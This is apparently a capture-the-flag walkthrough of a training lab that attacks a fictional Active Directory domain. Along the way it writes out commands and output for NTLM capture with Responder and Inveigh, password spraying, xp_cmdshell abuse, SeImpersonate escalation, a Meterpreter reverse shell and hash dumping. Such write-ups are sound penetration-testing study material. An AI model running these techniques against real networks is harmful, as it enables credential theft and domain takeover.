AD Enumeration & Attacks - Skills Assessment Part II
We already have SSH access to the internal network via a Parrot Linux VM without any credentials. Our objective is to compromise the Active Directory by gaining access to it and obtaining the krbTGT hash.
Obtain a password hash for a domain user account that can be leveraged to gain a foothold in the domain. What is the account name?
First i ran an Nmap scan and used responder to capture any NTLM hash
nmap -T4 -A 172.16.6.0/23 -oN nmap_scan.txt &
responder -I ens24&
At the moment of enumeration. i determined the IP address of the domain controller by using 'nslookup'. Then i attempted to check for any null sessions in SMB or rpcclient, but no success. Subsequently i resorted to using ldapsearch to gather information from LDAP initiating the command as follows:
Nmap scan report for inlanefreight.local (172.16.7.3)
Host is up (0.040s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-18 21:44:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: INLANEFREIGHT.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: INLANEFREIGHT.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:c9:44 (VMware)
| smb2-time:
| date: 2024-03-18T21:44:06
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: -1s
Nmap scan report for 172.16.7.50
Host is up (0.040s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-03-18T21:44:16+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=MS01.INLANEFREIGHT.LOCAL
| Not valid before: 2024-03-17T21:40:47
|_Not valid after: 2024-09-16T21:40:47
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: MS01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:7c:72 (VMware)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-03-18T21:44:08
|_ start_date: N/A
Nmap scan report for 172.16.7.60
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-03-18T17:45:52+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-03-18T17:20:37
|_Not valid after: 2054-03-18T17:20:37
| ms-sql-ntlm-info:
| Target_Name: INLANEFREIGHT
| NetBIOS_Domain_Name: INLANEFREIGHT
| NetBIOS_Computer_Name: SQL01
| DNS_Domain_Name: INLANEFREIGHT.LOCAL
| DNS_Computer_Name: SQL01.INLANEFREIGHT.LOCAL
| DNS_Tree_Name: INLANEFREIGHT.LOCAL
|_ Product_Version: 10.0.17763
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: SQL01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:ce:a5 (VMware)
| ms-sql-info:
| Windows server name: SQL01
| 172.16.7.60\SQLEXPRESS:
| Instance name: SQLEXPRESS
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
| TCP port: 1433
|_ Clustered: false
| smb2-time:
| date: 2024-03-18T17:45:47
|_ start_date: N/A
So we have:
Domain Controller (DC) with IP address: 172.16.7.3
MS01 host with IP address: 172.16.7.50
SQL01 server with IP address: 172.16.7.60
After finishing the analysis i noticed that I obtained a hash of a user. Do you remember the Responder tool we started with initially? The hashes are saved in "/usr/share/responder/logs/SMB-NTLMv2-SSP-IpTarget". Now all we need to do is crack this NTLMv2 hash using hashcat.
As you can see we can use WinRM on MS01. Therefore we'll use Evil-WinRM because i prefer it over Impacket-WMIExec as it offers more features such as download and upload capabilities ..etc
evil-winrm 172.16.7.50 -u '' -p ''
and got the flag
Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.
I've attempted several techniques here but none have worked and i'm reconsidering whether the question implies performing a password spray attack so let's check the lockout threshold on the account to understand how many attempts we have before the account gets locked out.
*Evil-WinRM* PS C:\Users\AB920\Documents> net accounts
Force user logoff how long after time expires?: Never
Minimum password age (days): 0
Maximum password age (days): 42
Minimum password length: 1
Length of password history maintained: None
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: SERVER
The command completed successfully.
So we don't have a specific number meaning we can spray passwords as often as we want. However let's focus on setting a weak password and spraying it across all user accounts. To obtain a list of users in the domain we can use the credentials of the compromised user with the following command:
The passwords were discovered in the previous question using Kerbrute.
Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file?
"I used the credentials of the user "BR086" to enumerate all shared files over the network so for this task i employed my favorite tool "smbmap".
smbmap -u BR086 -p Welcome1 -H 172.16.7.3
[+] IP: 172.16.7.3:445 Name: inlanefreight.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Department Shares READ ONLY Share for department users
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
So let's enumerate each directory. To simplify this process i continue using the same tool which is why I prefer it. I'll start with the 'netlogon' directory.
i discovered a suspicious file named 'web.config' in the 'netlogon' directory. Upon downloading it i found credentials of a user. you can download the file with any command you prefer. As always i used smbmap for this task.
smbmap -u BR086 -p Welcome1 -R Department Shares -H 172.16.7.3 -A web.config -q
Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
i used MSSQL to authenticate with the user obtained credentials using the following commands.
mssqlclient.py INLANEFREIGHT/netdb@172.16.7.60
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(SQL01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
SQL> xp_cmdshell
and i run "whoami /priv" and i found these juicy privileges
SQL> xp_cmdshell "whoami /priv"
output
--------------------------------------------------------------------------------
NULL
PRIVILEGES INFORMATION
----------------------
NULL
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
NULL
We're aware that we can exploit the "SeImpersonatePrivilege" privilege with various exploits. In my case i exploited it using the printSpooler to obtain a shell as "nt authority\system". To do this i generated a reverse tcp shell with msfvenom using the following command:
I utilized Meterpreter to facilitate transferring files and also dumping hashes with the 'include' option and i downloaded the 'printSpooler.exe' and 'shell.exe' files to the target machine "SQL01" using the following command:
[*] Started reverse TCP handler on 172.16.7.240:4444
[*] Sending stage (200262 bytes) to 172.16.7.60
[*] Meterpreter session 1 opened (172.16.7.240:4444 -> 172.16.7.60:56938 ) at 2024-03-18 14:30:56 -0400
meterpreter > shell
Process 5580 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.2628]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
so you can read the flag
Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
Here i simply dumped the hash using the 'hashdump' option in Meterpreter which provided me with the administrator hash.
Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name?
i run SharpHound
.\SharpHound.exe -c ALL --zipfilename enum
Then i downloaded it to my Kali machine and extracted it, to use GUI version of BloodHound. iselected 'Find Shortest Paths to Domain Admins'.
so the answer is "GT059" user
Crack this user's password hash and submit the cleartext password as your answer.
Here i attempted to use Mimikatz to extract any credentials from memory but it did not work. Then i recalled the functionality of 'Inveigh.exe' which is similar to Responder in Linux so downloaded it to MS01.
Evil-WinRM* PS C:\Users\Administrator\Desktop> upload Inveigh.exe
Info: Uploading Inveigh.exe to C:\Users\Administrator\Desktop\Inveigh.exe
let's capture some ntlm ticket
.\Inveigh.exe
boom we capture the NTLMv2 of the user "CT059" so we need just to crack it now
Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.
So we need to add any compromised user whose credentials we have to the Domain Admins group with the 'GenericAll' ability in my case i will add user 'AB920' and still have a session on the SQL01.inlanefreight host. You can execute these commands on the MS01 host it will work the same way.
